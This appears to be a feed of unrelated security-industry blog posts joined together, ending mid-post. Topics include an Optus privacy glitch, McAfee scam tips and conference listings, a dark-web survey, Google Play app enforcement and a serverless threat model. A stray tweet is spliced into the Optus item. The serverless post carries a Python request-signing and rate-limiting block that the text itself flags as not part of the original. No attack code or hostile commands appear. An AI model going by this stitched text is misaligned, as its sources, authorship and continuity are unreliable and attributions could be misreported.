Optus privacy breach: names, addresses and details revealed in sim card glitch

Some mobile users were able to see records of others when logging on to the phone service

Optus has scrambled to contact customers whose personal details were revealed in a system glitch, affecting pre-paid mobile sim card activation and the company’s account website.

Some customers have reported being able to see what looked like other customers’ personal details, including names, addresses and phone numbers while trying to activate a mobile phone sim card.

Hey @Optus I just got an email saying my latest bill is ready. It's $300. It should be less than $100 as my usual plan. I logged into my account and it said "Hi Vladamir". I have a screenshot. What's the go??!

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams that use clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery — Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime, delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email asking you to review a product to get rewards. If you click on the link, it could deliver malware, or even ransomware.

Tech Support — This is one of the oldest, but most persistent, scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Get More Bang for your Buck: Hire an MSSP vs. an In-House Expert

Many leaders in security feel some degree of uncertainty when they see the price tag that accompanies Managed Security Service Providers (MSSPs). While the hesitation is understandable, it’s not necessarily logical.

When the options are narrowed down to hiring an MSSP or hiring a single employee, the costs end up being roughly the same.  The difference, though, lies in what you are getting for your money. For instance, when you hire a single employee, you are limited in ways that an MSSP is not.

Consider, what will you do when your employee wants to take time off, or gets sick? How many different areas of expertise can this employee cover? Will they work around the clock? If not, how will you stay secure outside of business hours?

Keep these questions in mind as we take a look at what exactly you are paying for when you hire an MSSP:

At any one time, most MSSPs are staffed with at least four analysts. And I mean any time. Don’t forget that a key component of MSSPs is that they are operating around the clock, 24/7/365. This doesn’t include the threat hunting experts or incident response specialists that many MSSPs have on staff in case of an incident. To achieve protection similar to what an MSSP provides, you would need a dedicated staff of at least 4-6 employees.

Now take into consideration that your employees will be expecting benefits and paid time off. You must also account for the unexpected circumstances, such as family emergencies and illness, that will undoubtedly arise as they do in any staff. An MSSP, however, already has these factors accounted for and will be appropriately staffed to ensure around-the-clock security coverage.

And, because of the significant number of employees you have access to, you will naturally have access to a wide variety of skills: a much larger range of expertise than a single employee, or even two or three employees for that matter, could cover. Not to mention, you will have a hard time finding employees that are willing to work swing shifts. With a cybersecurity skills shortage of 2.9 million employees, you may have a hard time finding employees at all. And, if you do find a talented employee, you can bet it’ll be a constant struggle keeping them around with the sheer amount of recruiters knocking at their doors.

But it’s not only the talent and expertise you are paying for when you hire an MSSP.  With an MSSP you are also getting access to the best-in-class technology as well, including SIEM, endpoint monitoring, and reporting tools.

So, yes, hiring an MSSP is comparable in cost to hiring one security professional. But, if you’re paying the same amount, why not get the most out of your money?  The benefits that an MSSP provides you with that a single employee cannot are immense:

  • 24/7 coverage without the worry of finding and retaining talent during the cybersecurity skills shortage
  • Relief from the burden of staffing and accounting for PTO, sick time, or overnight staff
  • Security protection from diverse areas of expertise
  • Access to the best-in-class technology

Keep in mind that in order to reap the many benefits of an MSSP, you must be deliberate when choosing your security partner.

Find the right MSSP for your needs with our Comprehensive Guide.

The post Get More Bang for your Buck: Hire an MSSP vs. an In-House Expert appeared first on GRA Quantum.

The Best Ways to Catch McAfee at RSA Conference 2019

In just a few weeks, San Francisco will be taken over by cybersecurity professionals and vendors at Moscone Center for the 2019 RSA Conference. There’s a lot packed into the conference—that’s why we’re breaking down the best ways to see McAfee in action. So take out your calendars and make note of the events below.

McAfee Leadership Takes the Stage

CSA Summit Keynote: Case Study: Behind the Scenes of MGM Resorts’ Digital Transformation
Monday, March 4 | 11:35 am – 11:55 am | Moscone Center

Rajiv Gupta, Senior Vice President, Cloud Security Business Unit, McAfee

Scott Howitt, Senior Vice President & Chief Information Security Officer, MGM Resorts International

As a leader in their industry, MGM is transforming into a digital business by aggressively adopting the cloud to make their employees more engaged and productive and to deliver modern experiences to their customers. Join Rajiv Gupta, SVP of McAfee’s Cloud Business, and Scott Howitt, SVP and CISO for MGM Resorts International, to hear how MGM is protecting their enterprise data across the whole spectrum of their evolving infrastructure, from on-prem, to the device, to their SaaS, IaaS and PaaS cloud instances. More, here.

 

Session: #Ransomware – The Rise, Death and Resurrection of Digital Extortion
Monday, March 4 | 4:45 pm – 5:15 pm | Session Code: SEM-M03

John Fokker

Head of Cyber Investigations

Raj Samani

Chief Scientist, McAfee Fellow

Hear from cybercrime experts on the successes and lessons learned from the No More Ransom initiative, an online portal that has prevented millions of dollars in ransom payments to cybercriminals. Recent statistics point to a decrease in the number of ransomware variants. So, is ransomware dead? Not so fast. Get up to speed on what’s new in the ongoing effort to combat the threat of ransomware. More, here.

Keynote: Lightning in a Bottle, or Burning Down the House?
Tuesday, March 5 | 8:35 am – 8:55 am | RSA, West Stage

Dr. Celeste Fralick

Chief Data Scientist

Steve Grobman

Senior Vice President and Chief Technology Officer

Fire. In the wild, it’s a force for destruction. Controlled, it powers civilization’s forward evolution. But containing phenomena—natural or manmade—is a devilish challenge. Today’s regulatory hotspots include AI and quantum computing, because innovations that strengthen defenses can also fuel targeted threats. The weaponization of AI to amplify cyberattack impacts is enough to give anyone pause, so discussion of export controls on these and other technologies is a worthy conversation. What is the path forward to advance and protect human progress? How do we nurture sparks of innovation without burning bridges to the future? More, here.

Session: Using Machine Learning to Improve Security Predictions
Tuesday, March 5 | 11:00 am – 11:50 am | Session Code: SPO2-T06

Grant Bourzikas

Chief Information Security Officer (CISO) & Vice President of McAfee Labs Operations

Organizations are overwhelmed by data and dependent on outdated (nonpredictive) tools and methods. Security companies can’t keep up with the frequency of attacks, 50% of which are missed by traditional antivirus programs. In this session, McAfee’s CISO will share his experiences, providing valuable information for security organizations to predict attacks by relying on data science and machine learning. More, here.

Session: Multiparty Vulnerability Disclosure: From Here to Where?
Wednesday, March 6 | 9:20 am – 10:10 am | Session Code: PDAC-W03

As the world grows ever more dependent on complex technological systems, the risk of broadly impactful vulnerabilities in software and hardware is driving the need for improvements in how the global ecosystem addresses identification and disclosure of those vulnerabilities. This panel will discuss what works, what doesn’t, and suggest a path forward that can benefit everyone globally. More, here.

Moderator: John Banghart, Senior Director, Venable

Panelists: Kent Landfield, Chief Standards and Technology Policy Strategist, McAfee LLC

Art Manion, Vulnerability Analysis Technical Manager, CERT Coordination Center

Audrey Plonk, Director, Global Security Policy, Intel Corporation

Session: Law Enforcement: The Secret Weapon in the CISO’s Toolkit
Friday, March 8 | 11:10 am – 12:00 pm | Session Code: AIR-F03

John Fokker

Head of Cyber Investigations

This session will show you how to get the most out of working with law enforcement agencies (LEA) before, during or after a security breach. Learn why partnering with law enforcement can be a valuable strategic asset in the CISO’s ever-expanding toolbox of security measures. More, here.

Hack Your Way Through the Crowds at the McAfee Booth

We’re hosting a fun and interactive Capture the Flag challenge at our RSA booth to test the investigative and analytical skills of RSA attendees. Contestants will be given various challenges and will receive “flag” details on how to complete each challenge as quickly and accurately as possible. Want to know who is in the lead? Don’t worry, we’ll have a live scoreboard. The winner of the RSA Capture the Flag contest will get bragging rights and a cool prize to take home. Visit us at booth #N5745 in the North Hall.

Cloud Security BarCade Challenge

Tuesday, March 5 | 6:00 pm – Midnight | Coin-Op Game Room, San Francisco | 508 4th Street

We’re hosting an epic cloud security networking event at Coin-Op Game Room in San Francisco! What’s the challenge? Come out to see us and find out. There will be prizes, games, food, networking, and more. Register here.

RSA After-Hours Social & Cloud Security Panels

Wednesday, March 6 | 6:30 pm – 11:00 pm | Mourad, San Francisco | 140 New Montgomery Street

We’re bringing the cloud community together for a night of networking at Mourad, so grab your peers and head over to the after-hours social. We will have a DJ, awesome food, creative libations, and a VIP area upstairs for a private whiskey tasting. Throughout the night, we’ll be hosting cloud security panels, where you’ll hear perspectives from industry experts on the current security landscape, best practices, and how to elevate your cloud security posture. Register here and join us as we close out RSA at the after-hours social of the year.

There’s a lot to look forward to at RSA 2019, so be sure to stop by booth #N5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XSU9MCAFEE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

The post The Best Ways to Catch McAfee at RSA Conference 2019 appeared first on McAfee Blogs.

Beyond Tor: Examining the Uncharted Corners of the Dark Web

More Than Tor: Deep Dive Into the Dark Web with Ben Brown Veracode

Discussions about the darknet or dark web are typically centered around the Tor network, and the data from breaches, password dumps, and hacked emails that can be found there. There is little focus or discussion about the other extant darknet frameworks, and the fact that the dark web is actually composed of multiple networks designed for specific underground activity. While Europol reports and high-profile takedowns of Tor services en masse have indicated the activity is, indeed, dark, this is not always the case when you look at the dark web in its totality.

The dark web is a complex, layered environment that raises equally complex interplay involving free speech, capitalism, and potential illicit or criminal activity. It is also home to what could be considered hobbyist uses: anonymous chess over I2P, puzzle and art installments, underground market offerings for bags of beach sand or pet bricks, and John Wayne fan sites. The dark web’s networks are made up of active users from around the world, and in addition to finding hackers for hire, you can also find legitimate advanced courses from technologists who help to dissect cyberthreats.

Each darknet was created with different intentions and ideas in mind, with developers who possess different goals for the network’s use. While one is popular with hacktivists, another is preferred by cybercriminals looking for profit, and another for fringe groups and crypto enthusiasts. New darknet frameworks are emerging and will continue to emerge into the distant future.

Here we examine some of the frameworks that exist, and what the activity in each framework reveals about the varying motivations of its users, offering a more complete and realistic understanding of the dark web’s ecology.

A Closer Look at Dark Web Frameworks

Tor’s stated goals are to protect your privacy and defend you against network surveillance and traffic analysis. Another major, and more recent, goal is to bring wider access to anonymous web browsing by increasing user-friendliness. This is not something you see as a major goal for the darknets other than Tor and OpenBazaar. Tor gets lots of media attention for terrorism, but this is not necessarily a valid perception. I didn’t observe much in the way of terrorist activity; this darknet is driven by what’s for sale, which includes hacking for hire, tools for sale, and activity related to money-laundering services. The audience here is primarily made up of English speakers.

Freenet is a peer-to-peer platform for censorship-resistant communication and publishing, and focuses heavily on the promotion of freedom of speech over censorship, copyright, and takedown. It is here I uncovered documents like handbooks and information from terrorist organizations, and even an assassination plan and other extreme activity. Freenet is driven by ideology rather than financial motives, and it has a number of social platforms and chat systems. Its users tend to lean toward a small or non-intrusive government, and it is popular with crypto activists. On this darknet, we have not found anything for sale in our research, likely because its users give away useful information. It is home to hacked documents, including leaked, confidential TTIP negotiation documents; internal Diebold emails about how their voting machines are flawed; pre-written Spectre exploit code and guide; and data or document dumps that are public. To date, it has resisted any external takedown attempts.

The I2P project is a popular darknet for multiple self-proclaimed factions of Anonymous and other self-described hacktivists. In fact, its stated mission is that it is intended to “protect communication from dragnet surveillance and monitoring by third parties such as ISPs” and is “used by many people who care about their privacy: activists, oppressed people, journalists and whistleblowers, as well as the average person.” The content is primarily in Russian, Chinese, and English, and includes an archive of past classes for hacktivists that cover hacking and different techniques. Some of the talks still have the names of the presenters on them, including a course on advanced web application hacking given by a researcher from a top technology firm. This darknet also includes a chat portal, access to a DDoS tool, and a web application vulnerability scanner.

As I researched I2P, I also found a cryptocurrency that I had not previously run into called GOSTcoin, which is a branch of anoncoin and has a small clearnet footprint. It was developed specifically for I2P use and is allegedly based on Russian Government cryptography, though I haven’t yet audited the code to verify this claim. It has a very light presence on Facebook, Twitter, LinkedIn, and in some cryptocurrency forums.

OpenBazaar is one of the newest dark web frameworks, and its purpose is to offer a feeless, peer-to-peer marketplace that leverages cryptocurrencies for transactions. There are some illicit offerings, including drugs, hacking tools, books and services, stolen media streaming accounts, and bulk social media accounts. However, the majority is more mundane: original artwork, jewelry, clothing, books, and health supplements. A wealth of interesting information based on geographies and language use can help us contextualize these frameworks, their underpinnings, and their offerings.

Is the Dark Web the Future of the Internet?

We are still a long way from the Dark Web taking a place as a mainstream means of accessing the worldwide web. These technologies are overlay networks, and they require the regular, clearnet internet to operate. Some meshnet projects have shown progress and are able to operate separately; however, they are still in their infancy and have relatively few users. When the dark web is discussed by the media or public sector, they often invoke an image of some hidden and shielded den of crime populated by anonymous ne'er-do-wells engaged in illicit affairs.

While this narrative is useful for getting views and justifying budgets, it can also lend itself to skewed threat modeling and unfocused alarm. The majority of the content I found in my research was, in most cases, rather benign. The criminals offering or seeking illicit goods or services were present on each of the darknets, but made up a small minority of the network activity and content. Much more of this type of commerce is found on the clearnet (typically in forums, many with vetting systems).

The dark web should have a place in many entities’ risk analysis and threat modeling, but it is important to understand both the sort of content that is contained or trafficked there, and the scale of this activity when compared to other theaters such as meatspace, telecom systems, or the clearnet. With that, remember that buying weapons is much easier and less expensive through legitimate venues or off the street, human trafficking is by and large the domain of word of mouth and Craigslist-like clearnet sites, and there are no legitimate hitmen for hire on the dark web, no matter what the media may say.

To learn more about each of the dark web frameworks and my analysis, download my research paper, “More Than Tor: A Deep Dive.”

What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day?

I was listening to my friend’s Valentine’s Day playlist when I suddenly espied one of my favorites, Ain’t No Mountain High Enough, and started humming the song. Remember it?

If you need me call me

No matter where you are

No matter how far;

Just call my name

I’ll be there in a hurry

You don’t have to worry coz

Baby there ain’t any mountain high enough…

To keep me from getting to you.

Post becoming a mom, it resonated more with me and I would often find myself singing the song whilst doing my daily chores. (Hope the kids heard me and remember the words!).

In the digital age, when kids are maturing faster and social media reflects the rapid rate at which hearts are getting connected and then disconnected, it’s important that we talk about online romances, dating sites and privacy with our teens.

Is your teen sporting a moony look and walking around as if on cloud 9? Then it’s time to sit them down and have ‘the talk’, the one about crushes, love, and the need to keep their digital life separate from their romantic life.

So how do you go about it? You can start on a light note, discussing Valentine’s Day and the number of roses they may have received or gifted. Talk about their friends and the various plans they are making for this special day. You may then gently lead the conversation to online romances and the rising interest in dating websites among adolescents. Finally, it’s time to discuss account security and privacy.

Here are some tips you can share with your kids during your heart-to-heart talk on digital age romance:

  • Whisper sweet nothings in each other’s ears but not your account passwords
  • Share your hobbies and dreams, but keep your sensitive information private
  • Make new friends online but only as long as the conversation stays decent and non-intrusive
  • Use PIN or biometrics to lock your devices. Set autolock to 10 sec
  • Money attracts the attention of cyber criminals like nothing else. Avoid making online payments to help out a friend seemingly in distress, without consulting someone senior and trusted. Be judicious – do not share ATM PIN or credit card CVV number
  • Take time to decide whether or not you want to create a shared social media account, and avoid it if possible, since you would not have control over what gets posted
  • If your social media account is compromised, write a general post informing everyone about it, take screenshots of the offending content, and delete the account
  • Use only secured devices with authentic software; this is to be implemented without fail by all family members

Isn’t it also a good time to talk to kids about real love, the love that isn’t limited to romance? Love is also when Mom gets up at midnight to make a studious child a cup of hot chocolate; when Dad forgoes his annual vacation plans to buy a collegian a dream laptop; when friends make plans to spend the maximum time possible with a depressed friend; when a teacher spends extra time helping a child improve grades; when a 4-year-old makes and proudly serves her Mom a cup of tea. Love is all that and more.

Recently Safer Internet Day was celebrated worldwide and I am really happy to note that not only security firms, government agencies and experts, but even schools, media and various NGOs showed support through activities, slogans, posts and discussions. Though the number is still insignificant, if you consider that we are a billion plus nation, it’s a start. Awareness of the issue and commitment to be a changemaker are the first two steps towards a positive digital life.

Here are some DIY ideas for your child for Valentine’s Day:

  1. Make cards for near and dear ones, showing appreciation and love
  2. Make and hang heart chains to decorate their rooms/the house
  3. Get flowers and chocolates for grandparents, domestic help, school bus drivers, canteen staff etc. to thank them for their support
  4. Compose poems and songs mentioning each loved one and sing it at the next social meet
  5. Visit a children’s hospital with parents and share cards and small gifts

These activities will not only boost their creativity and their appreciation of real relationships, but will also help them lead a balanced digital life.

Happy Valentine’s Day to you all!

The post What About a Heart-To-Heart Talk with Your Loved Ones This Valentine’s Day? appeared first on McAfee Blogs.

How we fought bad apps and malicious developers in 2018


Posted by Andrew Ahn, Product Manager, Google Play
[Cross-posted from the Android Developers Blog]

Google Play is committed to providing a secure and safe platform for billions of Android users on their journey discovering and experiencing the apps they love and enjoy. To deliver against this commitment, we worked last year to improve our abuse detection technologies and systems, and significantly increased our team of product managers, engineers, policy experts, and operations leaders to fight against bad actors.

In 2018, we introduced a series of new policies to protect users from new abuse trends, detected and removed malicious developers faster, and stopped more malicious apps from entering the Google Play Store than ever before. The number of rejected app submissions increased by more than 55 percent, and we increased app suspensions by more than 66 percent. These increases can be attributed to our continued efforts to tighten policies to reduce the number of harmful apps on the Play Store, as well as our investments in automated protections and human review processes that play critical roles in identifying and enforcing on bad apps.

In addition to identifying and stopping bad apps from entering the Play Store, our Google Play Protect system now scans over 50 billion apps on users' devices each day to make sure apps installed on the device aren't behaving in harmful ways. With such protection, apps from Google Play are eight times less likely to harm a user's device than Android apps from other sources.

Here are some areas we've been focusing on in the last year and that will continue to be a priority for us in 2019:

Protecting User Privacy

Protecting users' data and privacy is a critical factor in building user trust. We've long required developers to limit their device permission requests to what's necessary to provide the features of an app. Also, to help users understand how their data is being used, we've required developers to provide prominent disclosures about the collection and use of sensitive user data. Last year, we rejected or removed tens of thousands of apps that weren't in compliance with Play's policies related to user data and privacy.

In October 2018, we announced a new policy restricting the use of the SMS and Call Log permissions to a limited number of cases, such as where an app has been selected as the user's default app for making calls or sending text messages. We've recently started to remove apps from Google Play that violate this policy. We plan to introduce additional policies for device permissions and user data throughout 2019.

Developer integrity

We find that over 80% of severe policy violations are conducted by repeat offenders and abusive developer networks. When malicious developers are banned, they often create new accounts or buy developer accounts on the black market in order to come back to Google Play. We've further enhanced our clustering and account matching technologies, and by combining these technologies with the expertise of our human reviewers, we've made it more difficult for spammy developer networks to gain installs by blocking their apps from being published in the first place.

Harmful app contents and behaviors

As mentioned in last year's blog post, we fought against hundreds of thousands of impersonators, apps with inappropriate content, and Potentially Harmful Applications (PHAs). In a continued fight against these types of apps, not only do we apply advanced machine learning models to spot suspicious apps, we also conduct static and dynamic analyses, intelligently use user engagement and feedback data, and leverage skilled human reviews, which have helped in finding more bad apps with higher accuracy and efficiency.

Despite our enhanced and added layers of defense against bad apps, we know bad actors will continue to try to evade our systems by changing their tactics and cloaking bad behaviors. We will continue to enhance our capabilities to counter such adversarial behavior, and work relentlessly to provide our users with a secure and safe app store.


Kicking off 2019 with Recognition Across the McAfee Portfolio

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude of technologies. Excellence that we believe is validated by our larger peer and analyst community.

We’ve just announced that McAfee was named a Gartner Peer Insights Customers’ Choice for another two technologies. Our customers have recognized us as a January 2019 Gartner Peer Insights Customers’ Choice for Secure Web Gateway for McAfee Web Protection, McAfee Web Gateway, and McAfee Web Gateway Cloud Service. In addition, for the second year in a row McAfee’s MVISION Cloud (formerly McAfee Skyhigh Security Cloud) was named a January 2019 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In 2018, McAfee was the only vendor named a Customers’ Choice in the Cloud Access Security Brokers market.

Our team at McAfee takes great pride in these distinctions, as customer feedback is essential in shaping our products and services. We put our customers at the core of everything we do, and this shows pervasively across our portfolio. We believe our position as a Gartner Peer Insights Customers’ Choice for Secure Web Gateway, Data Loss Prevention, SIEM, Endpoint Protection, and Cloud Access Security Broker (CASB) is a testament to the strength of our device-to-cloud strategy. This adds up to recognitions in the last year in five different markets.

We also think it’s a signal of the way enterprises are approaching security – with the innovative technology solutions and integrated strategies that must evolve to fight a threat that is constantly evolving, too.

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN

Leslie Bois, Vice President of Global Channel and Alliances

Leslie Bois, Veracode’s Vice President of Global Channel and Alliances, has been selected to the prestigious CRN 2019 Channel Chiefs list. Bois earned the industry recognition for the second consecutive year, a reflection of the growth and influence she has introduced since joining Veracode in 2017.

Bois is responsible for developing and executing Veracode’s global strategy to build a strong partner network that plays a significant role in the company’s go-to-market efforts. She works cross functionally to align all aspects of the business to support channel partners to grow their businesses with Veracode’s platform of leading application security solutions.

Under her leadership, Veracode’s channel pipeline has grown by three times over the past 12 months, and the company’s international business is growing rapidly in partnership with managed security service providers around the world. Veracode has added partners in emerging markets in Asia, Latin America, Europe and the Middle East, and has enabled channel partner success by realigning channel support and resources.

“It’s an honor to earn this recognition from CRN, and reflects the hard work Veracode is doing on behalf of customers to maintain security at the speed of development,” said Bois. “The application security market is poised to take off, and our focus in 2019 will be ensuring our partners are equipped to provide the solutions and training businesses need to secure their software. It's imperative that good software is synonymous with secure software. Solution providers are going to be critical in helping meet the demands of enterprise and SMB application security programs.”

Each of the 2019 Channel Chiefs has demonstrated exceptional leadership, vision, and commitment to their channel partner programs. Channel Chief honorees are selected by CRN’s editorial staff as a result of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.

“The individuals on CRN’s 2019 Channel Chiefs list deserve special recognition for their contribution and support in the development of robust partner programs, innovative business strategies, and significant influence to the overall health of the IT channel,” said Bob Skelley, CEO of The Channel Company. “We applaud each Channel Chief’s remarkable record of accomplishments and look forward to following their continued success.”

Read the press release here, and find out more about partnering with Veracode by visiting here.

The Exploit Model of Serverless Cloud Applications

Serverless platform-as-a-service (PaaS) offerings are being deployed at an increasing rate for many reasons. They relate to information in a myriad of ways, unlocking new opportunities to collect data, identify data, and ultimately find ways to transform data to value.

Figure 1. Serverless application models.

Serverless applications can cost-effectively reply to and process information at scale, returning critical data models and transformations synchronously to browsers or mobile devices. Synchronous serverless applications unlock mobile device interactions and near-real-time processing for on-the-go insights.

Asynchronous serverless applications can create data sets and views on large batches of data over time. We previously needed to have every piece of data and run batch reports, but we now have the ability to stagger events, or even make requests, wait some time to check in on them, and get results that bring value to the organization a few minutes or an hour later.

Areas as diverse as tractors, manufacturing, and navigation are benefiting from the ability to stream individual data points and look for larger relationships. These streams build value out of small bits of data. Individually they’re innocuous and of minimal value, but together they provide new intelligence we struggled to capture before.

The key theme throughout these models is the value of the underlying data. Protecting this data while still using it to create value becomes a critical objective for the cloud-transforming enterprise. We can start by looking at the model for how data moves into and out of the application. A basic access and data model illustrates the way the application, the access medium, the cloud service provider’s (CSP’s) security, and the serverless PaaS application have to work together to balance protection and capability.

Figure 2. Basic access and data model for serverless applications.

A deeper exploration of the security environment—and the shared responsibility in cloud security—forces us to look more carefully at who is involved, and how each party in the cloud ecosystem is empowered to see potential threats to the environment, and to the transaction specifically. When we expand the access and data model to look at the activities in a modern synchronous serverless application, we can see how the potential threats expand rapidly.

Figure 3. Expanded access and data model for a synchronous serverless application.

Organizations using this common model for an integrated serverless PaaS application are also gaining information from infrastructure-as-a-service (IaaS) elements in the environment. This leads to a more specific view of the threats that exist:

Figure 4. Sample threats in a serverless application.

Pushing the information security team to consider more carefully and specifically the ways the application can be exploited lets them take simple actions to ensure that both development activities and the architecture of the application itself offer protection. A few examples:

  • Threat: Network sniffing/MITM. Protection: high-integrity TLS, with signed API requests and responses
  • Threat: Code exploit. Protection: code review, and SAST/pen testing on a regular schedule
  • Threat: Data structure exploit. Protection: API-forced data segmentation and request limiting, managed data model
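As an added illustration that is not part of the original post, the following Python sketch shows two of the protections listed above in a single request gate in front of a serverless handler: HMAC-signed requests and responses (bound to method, path, timestamp and body hash, with a freshness window so a captured request cannot simply be replayed later) and a per-client sliding-window request limiter. The shared secret, API path, record shape, thresholds and the `RESPONSE` label used when signing replies are all constructed for this example; a real deployment would hold per-client keys in a secrets manager and put the limiter in the API gateway.

```python
"""Added example (not the post's own code): signed requests/responses plus
request limiting as a gate in front of a serverless function.
All names, keys and thresholds are constructed for illustration."""
import hashlib
import hmac
import json
import time
from collections import defaultdict, deque

# Constructed shared secret; in practice a per-client key from a secrets manager.
SHARED_SECRET = b"example-shared-secret-not-for-production"
MAX_CLOCK_SKEW = 300  # seconds during which a signed request is accepted


def canonical_string(method, path, timestamp, body):
    """Bind method, path, time and a body hash so none can be swapped independently."""
    body_hash = hashlib.sha256(body).hexdigest()
    return "\n".join([method.upper(), path, str(timestamp), body_hash]).encode()


def sign(secret, method, path, timestamp, body):
    """HMAC-SHA256 over the canonical string; returned as hex."""
    return hmac.new(secret, canonical_string(method, path, timestamp, body), hashlib.sha256).hexdigest()


def verify(secret, method, path, timestamp, body, signature, now=None, max_skew=MAX_CLOCK_SKEW):
    """Reject stale or far-future timestamps (replay), then compare in constant time."""
    now = time.time() if now is None else now
    if abs(now - timestamp) > max_skew:
        return False
    expected = sign(secret, method, path, timestamp, body)
    return hmac.compare_digest(expected, signature)


class RequestLimiter:
    """Sliding-window limit per client: at most `limit` requests in `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self._hits = defaultdict(deque)

    def allow(self, client_id, now):
        hits = self._hits[client_id]
        while hits and now - hits[0] >= self.window:
            hits.popleft()          # forget requests that left the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


def handle_request(limiter, client_id, method, path, timestamp, body, signature, now):
    """Gate for the handler: cheap limiting first, then signature verification.
    Returns (status, response) where response carries its own signature."""
    if not limiter.allow(client_id, now):
        return 429, None
    if not verify(SHARED_SECRET, method, path, timestamp, body, signature, now=now):
        return 401, None
    payload = json.loads(body)
    # Return only the fields the caller is entitled to (data segmentation).
    resp_body = json.dumps({"record_id": payload.get("record_id"), "status": "ok"}).encode()
    # Constructed convention: responses are signed with the label "RESPONSE" in the method slot.
    resp_sig = sign(SHARED_SECRET, "RESPONSE", path, now, resp_body)
    return 200, {"body": resp_body, "timestamp": now, "signature": resp_sig}


if __name__ == "__main__":
    ts = int(time.time())
    body = json.dumps({"record_id": 7}).encode()
    sig = sign(SHARED_SECRET, "POST", "/v1/records", ts, body)
    print(handle_request(RequestLimiter(limit=2, window=60), "client-a", "POST", "/v1/records", ts, body, sig, now=ts))
```

The limiter runs before the HMAC check so that a flood of requests with bad signatures costs the function as little as possible; the response signature lets the browser or mobile client detect a reply altered in transit, complementing TLS rather than replacing it.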

The organization first must recognize the potential risk, make it part of the culture to ask the question, “What threats to my data does my change or new widget introduce?” and make it an expectation of deployment that privacy and security demand a response.

Otherwise, your intellectual property may just become the foundation of someone else’s profit.

The post The Exploit Model of Serverless Cloud Applications appeared first on McAfee Blogs.

Roses Are Red, Violets Are Blue – What Does Your Personal Data Say About You?

A classic meet-cute – the moment where two people, destined to be together, meet for the first time. This rom-com cornerstone is turned on its head by Netflix’s latest bingeable series “You.” For those who have watched, we have learned two things. One, never trust someone who is overly protective of their basement. And two, in the era of social media and dating apps, it’s incredibly easy to take advantage of the amount of personal data consumers readily, and somewhat naively, share online and with the cloud every day.

